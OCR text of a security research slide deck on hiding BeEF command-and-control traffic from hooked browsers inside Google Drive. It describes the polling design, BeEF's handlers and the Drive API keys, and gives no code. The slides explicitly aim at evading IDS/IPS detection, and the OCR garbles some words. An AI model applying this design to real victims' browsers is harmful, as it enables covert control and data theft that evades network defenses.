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Hooked-browser network with BeEF and Google Drive 
Post-exploitation 


After vulnerability exploitation and taking control 
over victim’s system intruder should find a way to 
establish communication between browser and 

C&C server 


Common communication channels in web 
application are: 

e XML HTTP Request 

e WebSockets 

e WebRTC 
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Prehistory 


Not long ago Christian Frichot (aka @xntrik) in his talk at 
Kiwicon 2014 presented BeEF WebRTC extension 


“One of the biggest issues with BeEF is that each hooked 
browser has to talk to your BeEF server. To try and avoid 
detection, you often want to try and obfuscate or hide 
your browsers. Using this bleeding-edge web technology, 
we can now mesh all those hooked browsers, tunneling 
all your BeEF come through a single sacrificial beach- 
head.” 
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Not totally invisible 


The last direct communication channel can l 
be tracked or blocked by IDS/IPS. So we gon e ae 
decided to find out a way to get rid of it 


Mm 2 


<% 


The main idea is to use some trusted 
server as a communication channel as it is 
done in projects like 


— XHR/WS 


Nasaud 
e Gcat 


e Twittor 
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Our previous researches 


Our team have researched a new type of covert timing 
channels based on HTTP cache control headers and 
couple of ways to implement it in different environments 


One of such environments was Google Drive, so we 
decided to use it in a communication channel one more 
time 
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We need a cloud 


Sometimes BeEF need to send a really huge 
amount of data so why not to use something 
that is designed to work with it? 
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Cloud storage services like Google Drive or 
Dropbox are trusted (not marked as 
suspicious activity) in most networks and 
have a nice API to work with them using 
JavaScript 
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Under the BeEF’s hood 


Let’s understand what’s going on in the BeEF 


Command server 
does all the stuff 
with zombies 


Ul server is used by 
an intruder and 
makes BeEF to look 
awesome 


BeEF server consisted of 2 parts 
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Intruder 
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hook.js forces 
browser to do the 
bad things 


Zombie browser 
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Command server details 


Command server can be viewed as a bunch of handlers each of which is 
doing its own job 


/ ‘/init’ handler — processes the 
information from new zombies : 
C, Send.the browser details 


| S ‘/event’ handler — stores logs 
TIED sent by zombies Log use 
| / ‘l handler — provides new 
CEN commands Get new commands 


Command handlers — separate Zombie browser 
a= handlers that processes results |< Send results 


each of his command 


Command server 
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The beginning of indirect communication 


As we can we BeEF is designed as common 
network application with active client and 
passive server 


vane 
So the first of all we should teach the 


server to tell with zombies via cloud using 
polling model 
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Zombie2 
Get an initial 
information about (a 
new coming zombies : Trash old files, empty 
the trash 
ai N Send commands to 
d L i 
| zombie browsers 
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Indirect communication on the client side 


Init Answers Zombiel Zombie2 


"a 


Pull commands from its own 
folder and move read 
commands to the trash 


Send browser default as 
a first request to the 
server 
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One more thing is access 


To perform action via Google Drive API we need 3 different keys: 


Auth key — used by client API key — used by client 
and server to perform any to read renewed Auth 
write access on the Google key from special 
Drive keychain file 


Master key — used by 
server to update Auth 
key via OAuth 
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Proof of Concept: https://youtu.be/ RfBUEcvynM 


https://github.com/tsu-iscd/beef-drive 
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Thank you for the attention! 
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